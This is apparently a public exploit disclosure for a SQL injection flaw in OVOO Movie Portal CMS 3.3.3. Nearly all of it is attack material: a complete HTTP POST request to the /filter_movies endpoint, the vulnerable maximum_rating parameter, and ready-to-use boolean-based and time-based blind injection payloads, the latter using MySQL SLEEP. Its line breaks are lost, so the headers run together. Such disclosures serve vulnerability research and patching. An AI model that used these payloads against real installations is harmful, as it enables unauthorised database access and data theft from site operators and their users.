OVOO Movie Portal CMS 3.3.3 SQL Injection

# Exploit Title: OVOO Movie Portal CMS v3.3.3 - SQL Injection# Date: 2023-08-12# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://codecanyon.net/item/ovoomovie-video-streaming-cms-with-unlimited-tvseries/20180569# Tested on: Kali Linux & MacOS# CVE: N/A### Request ###POST /filter_movies/1 HTTP/2Host: localhostCookie: ci_session=tiic5hcli8v3qkg1chgj0dqpou9495usUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)Gecko/20100101 Firefox/116.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://localhost/movies.htmlContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 60Origin: htts://localhostSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersaction=fetch_data&minimum_rating=1&maximum_rating=6.8&page=1### Parameter & Payloads ###Parameter: maximum_rating (POST)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND2238=2238&page=1Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND (SELECT4101 FROM (SELECT(SLEEP(5)))FLwc)&page=1